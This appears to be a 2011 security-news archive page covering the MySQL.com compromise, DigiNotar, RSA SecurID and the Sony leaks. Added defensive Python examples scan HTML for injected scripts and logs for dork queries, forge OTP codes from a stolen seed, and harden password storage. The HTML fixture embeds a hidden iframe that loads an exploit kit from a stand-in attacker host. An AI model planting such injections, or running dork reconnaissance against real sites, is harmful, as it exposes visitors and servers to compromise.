
Privacy, Security Archive

MySQL.com Hacked to Serve Malware

Well, this is embarrassing. MySQL.com has been hacked (fixed by now) and was turned into a platform serving malware to unsuspecting visitors. The criminals did this by injecting a script that redirected visitors to a site running the BlackHole exploit pack, which fingerprints the visitor's browser and serves up a matching exploit. Computer security blogger Brian Krebs saw root access to MySQL.com being offered for sale for $3000 only a few days earlier.
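The injection described above is a classic drive-by pattern: a single off-site script or zero-size iframe dropped into otherwise legitimate markup. The following is an added example (not code from the page, from MySQL.com or from any of the parties mentioned) of the quick check a site operator can run over the HTML actually served to visitors. The sample page, the hostnames and the site name passed in are constructed for illustration; the scanner flags script tags that load from a host outside the site (minus an explicit allowlist) and iframes that are either hidden or off-site.

```python
"""Scan served HTML for injected off-site scripts and hidden iframes (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page on mysql.com with one injected script and one
# hidden iframe placed next to legitimate markup. Not real captured content.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="//stats.example.net/r.js"></script>
</head><body>
<h1>MySQL</h1>
<iframe src="http://exploit.example/kit/index.php" width="0" height="0"></iframe>
</body></html>"""


class _InjectionScanner(HTMLParser):
    """Collect script and iframe tags that point off-site or are hidden."""

    def __init__(self, site_host, allow):
        super().__init__()
        self.site_host = site_host.lower()
        self.allow = {h.lower() for h in allow}   # hypothetical allowlist of known third-party hosts
        self.findings = []                         # (line, kind, src)

    def _off_site(self, url):
        host = urlparse(url).hostname   # "//host/x" parses as a network-path URL
        if host is None:                # relative URL: same origin
            return False
        host = host.lower()
        if host == self.site_host or host.endswith("." + self.site_host):
            return False
        return host not in self.allow

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "script" and a.get("src") and self._off_site(a["src"]):
            self.findings.append((line, "external-script", a["src"]))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (a.get("width") == "0" or a.get("height") == "0"
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden or self._off_site(a.get("src", "")):
                self.findings.append((line, "iframe", a.get("src", "")))


def find_injections(html, site_host, allow=()):
    """Return (line, kind, src) for every suspicious script or iframe in `html`."""
    scanner = _InjectionScanner(site_host, allow)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for line, kind, src in find_injections(SAMPLE_HTML, "mysql.com"):
        print(f"line {line}: {kind} -> {src}")
```

Run it against the HTML as delivered to a browser, not against the files on disk: a compromised server can serve different content to visitors than to the administrator, and a check that only looks at the source tree will miss exactly the injection that matters.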

DigiNotar Files for Bankruptcy

After having its SSL and EV SSL certificates deemed untrustworthy by the most popular browsers, VASCO announced that DigiNotar filed a voluntary bankruptcy petition and was declared bankrupt today. This is unsurprising, since a report issued by security audit firm Fox-IT, which was hired to investigate the now notorious DigiNotar breach, revealed that things were far worse than we had been led to believe.

Comodo Hacker: I Hacked DigiNotar Too; Other CAs Breached

"The hack of Dutch certificate authority DigiNotar already bore many similarities to the break-in earlier this year that occurred at a reseller for CA Comodo. Bogus certificates were issued for webmail systems, which were in turn used to intercept Web traffic in Iran. Another similarity has since emerged: the perpetrator of the earlier attacks is claiming responsibility for the DigiNotar break-in. Calling himself ComodoHacker, the hacker claims that DigiNotar is not the only certificate authority he has broken into. He says that he has broken into GlobalSign, and a further four more CAs that he won't name. He also claimed that at one time he had access to StartCom."

Dutch Government Takes Over DigiNotar

So, people from within Iran have hacked the Dutch company DigiNotar, allowing them to issue fake certificates so they could listen in on Iranian dissidents and other organisations within Iran. This is a very simplified version of the story, since it's all quite complicated and I honestly don't even understand all of it. In any case, DigiNotar detected the intrusion on July 19, but didn't really do anything with it until it all blew up in their face this past week. Now, the Dutch government has taken over operational management of DigiNotar... But as a Dutch citizen, that doesn't really fill me with confidence, because, well - whenever the Dutch government does anything even remotely related to IT technology, they mess it up. And mess it up bad.

Rogue SSL Certs Were Issued for CIA, MI6, Mossad

The number of rogue SSL certificates issued by Dutch CA DigiNotar has ballooned from one to a couple dozen to over 250 to 531 in just a few days. After Jacob Appelbaum of the Tor project shared the full list of the rogue certificates, it became clear that fraudulent certificates for domains of a number of intelligence agencies from around the world were also issued during the CA's compromise - including the CIA, MI6 and Mossad. Additional targeted domains include Facebook, Yahoo!, Microsoft, Skype, Twitter, Tor, WordPress and many others.

A Linux Distribution Engineered for Penetration Testing

Linux is a very versatile operating environment that caters to a wide range of users and needs. One such specific use is computer security and penetration testing. Among the security and digital forensic tools available for Linux, BackTrack is well known as an all-in-one platform that offers security professionals all the tools they may need to carry out various security-related tasks.

Researchers Identify First Flaws in AES

Researchers have found a weakness in the AES algorithm. They came up with a clever new attack (the "biclique" key-recovery attack) that recovers the secret key four times faster than experts had anticipated. In the last decade, many researchers have tested the security of the AES algorithm, but until now no flaws had been found. The new attack applies to all versions of AES, even when it is used with a single key. It shows that finding an AES key is four times easier than previously believed; in other words, AES-128 is more like AES-126. A factor of four is of no practical consequence: recovering a key still takes on the order of 2^126 AES operations, far beyond any feasible computation, so AES remains secure in practice. The result matters as the first dent in the full cipher's security margin, not as an attack anyone can run.

Search Engine Hack Innovation

Attackers armed with nothing more than specially crafted search queries are using botnets to issue more than 80,000 queries a day, identify potential targets and build an accurate picture of the resources on those servers that are potentially exposed. By automating the queries and parsing the results, the attacker can run a large number of searches, examine the returned results and obtain a filtered list of potentially exploitable sites in a very short time and with minimal effort. Because the searches are issued from botnet nodes rather than from the attacker's own IP address, the attacker's identity remains concealed, and the search engine's per-client throttling of automated queries is spread across many hosts.
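From the defender's side, the queries described above leave a trace: when a search-engine results page links to your server, the visitor's Referer header carries the search string, so a request that arrived via a query full of `inurl:`, `filetype:` or `intitle:` operators is a sign your site has been picked out by exactly this kind of reconnaissance. The following is an added example (not code from the page or from the report it summarises) that runs that check over web-server access logs in the Apache/nginx "combined" format and then groups hits by query, since the same operator-laden query arriving from many unrelated source addresses is what distributed, botnet-driven searching looks like. The log lines are constructed for illustration (RFC 5737 test addresses); the list of search-engine hosts and query parameters is an assumption that you would extend for your own traffic.

```python
"""Flag visits that arrived via search-engine "dork" queries (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Search operators used to locate exposed resources rather than content.
DORK_RE = re.compile(r'\b(inurl|allinurl|intitle|allintitle|intext|filetype|ext|site):', re.I)

# Assumed host prefix -> name of the query parameter on that engine's results page.
SEARCH_ENGINES = {"google.": "q", "bing.": "q", "yahoo.": "p"}

# Constructed sample log, not real traffic. Two different clients arrive via the
# same operator-laden query; one client arrives via an ordinary query.
SAMPLE_LOG = """203.0.113.7 - - [25/Sep/2011:10:01:02 +0000] "GET /admin/config.php HTTP/1.1" 200 512 "http://www.google.com/search?q=inurl%3Aadmin%2Fconfig.php+%22powered+by%22" "Mozilla/5.0"
198.51.100.23 - - [25/Sep/2011:10:01:05 +0000] "GET /backup.sql HTTP/1.1" 200 8192 "http://www.bing.com/search?q=filetype%3Asql+%22insert+into%22+password" "Mozilla/5.0"
203.0.113.99 - - [25/Sep/2011:10:01:40 +0000] "GET /admin/config.php HTTP/1.1" 200 512 "http://www.google.com/search?q=inurl%3Aadmin%2Fconfig.php+%22powered+by%22" "Mozilla/5.0"
192.0.2.9 - - [25/Sep/2011:10:02:11 +0000] "GET /about.html HTTP/1.1" 200 3100 "http://www.google.com/search?q=osnews+about" "Mozilla/5.0"
192.0.2.44 - - [25/Sep/2011:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def search_query(referer):
    """Return the search string if `referer` is a search-engine results page, else None."""
    u = urlparse(referer)
    host = (u.hostname or "").lower()
    for prefix, param in SEARCH_ENGINES.items():
        if host.startswith(prefix) or host.startswith("www." + prefix):
            values = parse_qs(u.query).get(param)
            return values[0] if values else None
    return None


def scan_log(lines):
    """One finding per request whose search referer used dork operators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                      # malformed or different log format
        query = search_query(m["referer"])
        if not query:
            continue                      # direct hit or non-search referer
        ops = sorted({op.lower() for op in DORK_RE.findall(query)})
        if ops:
            findings.append({"ip": m["ip"], "path": m["path"],
                             "query": query, "operators": ops})
    return findings


def distributed_queries(findings):
    """Count distinct source IPs per query; many IPs for one query suggests a botnet."""
    by_query = defaultdict(set)
    for f in findings:
        by_query[f["query"]].add(f["ip"])
    return {q: len(ips) for q, ips in by_query.items()}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["ip"]} {h["path"]} via {h["operators"]}: {h["query"]}')
    print(distributed_queries(hits))
```

Two caveats: a hit here means the resource was found, not that it is vulnerable, so the useful response is to review what the matched path exposes; and modern search engines strip the query from the Referer, so on current traffic the referer test degrades to "arrived from a search engine" and the per-path and per-query aggregation carries more of the signal.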

A Look Into Black Hat’s Wireless Network

Aruba Networks, which provided and maintained the wireless network for last week's Black Hat USA 2011 conference, today provided some interesting statistics on the network's use. Apple devices were most prevalent at 43.3 percent of all devices (28.4 percent for iOS iPads and iPhones, with another 14.9 percent running OS X). Linux users made up 35 percent of the total, while Windows users represented 21.8 percent. While the majority of attendees used the Black Hat PSK network, almost 200 attendees used the PEAP/EAP-TLS "secured" network. Aruba captured a huge number of security events, the most interesting of which were IP spoofing, AP spoofing, power-save DoS attacks and Block ACK attacks. Talk about a hostile environment.

5 Ways To Fight Mobile Malware

A new Trojan horse app has emerged to target Android devices, and this one's particularly creepy. The app records a user's phone calls and then uploads them to a remote server. The app was revealed Tuesday by security researcher Dinesh Venkatesan on the Security Advisor Research Blog, published by CA Technologies, now known as Total Defense. While this particular Trojan doesn't appear to be a threat in the wild, at least not for North American users, it's a good reminder of the growing threat of mobile malware.

Security Vendor Applauds LulzSec Attacks

In an unexpected move for a security company, SecurEnvoy today said that cyber break-ins and advanced malware incidents, such as the recent DDoS attack by LulzSec, should actually be welcomed and their initiators applauded. The company's CTO Andy Kemshall said: "I firmly believe that the media attention LulzSec’s DDoS attack has recently received is deserving. It’s thanks to these guys, who’re exposing the blasé attitudes of government and businesses without any personal financial gain, that will make a difference in the long term to the security being put in place to protect our own personal data!"

RSA Admits SecurID Tokens Have Been Compromised

RSA has finally admitted publicly that the March breach of its systems has resulted in the compromise of its SecurID two-factor authentication tokens. The admission comes in the wake of cyber intrusions into the networks of three US military contractors: Lockheed Martin, L-3 Communications and Northrop Grumman, one of them confirmed by the company concerned, the others only hinted at by internal warnings and unusual domain-name and password-reset activity.
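What "the tokens are compromised" means in practice: a hardware OTP token is only "something you have" because the seed inside it exists nowhere else, so a copy of the vendor's seed records lets an attacker compute the same codes the token displays. SecurID's own token algorithm is proprietary and not described on this page; the following added example (not code from RSA or from the page) uses the public RFC 4226 HOTP and RFC 6238 TOTP construction as a stand-in, because the point is identical. The seed database, token serial and the attacker's copy of it are constructed for illustration; the seed bytes happen to be the RFC test-vector seed, which is what the test below relies on.

```python
"""Why a leaked OTP seed database is a full token compromise (added example)."""
import hashlib
import hmac
import struct


def hotp(seed: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte counter, dynamically truncated."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(seed: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from the clock."""
    return hotp(seed, unix_time // step, digits)


def verify(seed: bytes, code: str, unix_time: int, step: int = 30,
           digits: int = 6, window: int = 1) -> bool:
    """Server-side check, tolerating +/- `window` steps of clock drift."""
    for drift in range(-window, window + 1):
        expected = totp(seed, unix_time + drift * step, step, digits)
        if hmac.compare_digest(expected, code):
            return True
    return False


# Constructed seed records, as a vendor or an authentication server holds them:
# token serial -> seed. This table is exactly what a breach of the vendor yields.
SEED_DB = {
    "000123456789": bytes.fromhex("3132333435363738393031323334353637383930"),
}


def attacker_code(stolen_db: dict, serial: str, unix_time: int) -> str:
    """With a stolen seed the attacker computes the code the real token is showing."""
    return totp(stolen_db[serial], unix_time)


def demo(unix_time: int = 1234567890):
    """Return (legitimate code, forged code, whether the server accepts the forgery)."""
    serial = "000123456789"
    legit = totp(SEED_DB[serial], unix_time)
    forged = attacker_code(dict(SEED_DB), serial, unix_time)   # attacker's copy of the table
    return legit, forged, verify(SEED_DB[serial], forged, unix_time)


if __name__ == "__main__":
    legit, forged, accepted = demo()
    print(f"token shows {legit}, attacker computes {forged}, server accepts: {accepted}")
```

Nothing in the verification path can tell the two apart, which is why the only remedy is to re-seed or replace the tokens. SecurID passcodes also prepend a user-chosen PIN to the token code, but once the seed is gone the PIN is the only secret left, and a short PIN is within reach of phishing or guessing, which is the exposure the contractor intrusions above illustrate.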

Sony Compromised, Again

"The hacker group LulzSec on Thursday posted information it took from Sony Entertainment and Sony BMG on its site, called the LulzBoat. The information includes about a million usernames and passwords of customers in the U.S., Netherlands and Belgium and is available for download and posted on the group's site. A release posted on LulzSec's page said the group has more, but can't copy all of the information it stole. The group also said none of the information it took from Sony was encrypted."

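The detail that matters in the Sony dump is the last sentence: the passwords were stored as-is, so the stolen table was immediately usable against every other site where those users reused them. The following is an added example (not code from the page, from Sony or from LulzSec) showing the plaintext user table beside the hardened form a practitioner would expect: a random per-user salt, an iterated key-derivation function (PBKDF2-HMAC-SHA256 from the standard library) and a constant-time comparison on login. The users, passwords and iteration count are constructed for illustration; the iteration count is an assumed work factor to be tuned to your own hardware.

```python
"""Plaintext versus salted, iterated password storage (added example)."""
import hashlib
import hmac
import os

ITERATIONS = 100_000   # assumed work factor; raise it as hardware gets faster


# --- What a plaintext user table looks like: the breach dump IS the password list.
def store_plaintext(users: dict, username: str, password: str) -> dict:
    users[username] = password
    return users


def check_plaintext(users: dict, username: str, password: str) -> bool:
    return users.get(username) == password


# --- Hardened form: per-user random salt, PBKDF2-HMAC-SHA256, self-describing record.
def store_hashed(users: dict, username: str, password: str, salt: bytes = None) -> dict:
    salt = os.urandom(16) if salt is None else salt    # fresh salt per user per change
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Record carries algorithm, cost and salt so the cost can be raised later per user.
    users[username] = f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"
    return users


def check_hashed(users: dict, username: str, password: str) -> bool:
    record = users.get(username)
    if record is None:
        return False
    algo, iters, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iters))
    # Constant-time compare: do not leak how many leading bytes matched.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def dump_reveals_password(users: dict, password: str) -> bool:
    """What a leaked table gives an attacker: does the secret appear verbatim in it?"""
    return any(password in str(value) for value in users.values())


if __name__ == "__main__":
    plain = store_plaintext({}, "alice", "hunter2")
    hashed = store_hashed({}, "alice", "hunter2")
    print("plaintext table leaks password:", dump_reveals_password(plain, "hunter2"))
    print("hashed table leaks password:   ", dump_reveals_password(hashed, "hunter2"))
    print("login with hashed record:      ", check_hashed(hashed, "alice", "hunter2"))
```

The salt does not have to be secret; its job is to make two users with the same password produce different records and to force an attacker to attack each record separately. The iterations are what make each guess expensive, which is the whole difference between a dump that is a password list and a dump that is a cracking job.
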
Mac Protector: Fake AV Targets Mac OS X Users

"A little over two weeks have passed since the appearance of MAC Defender, the fake AV solution targeting Mac users. And seeing that the approach had considerable success, it can hardly come as a surprise that attackers chose to replicate it. This time, the name of the rogue AV is Mac Protector, and the downloaded Trojan contains two additional packages. As with MAC Defender, the application requires root privileges to get installed, so the user is asked to enter the password."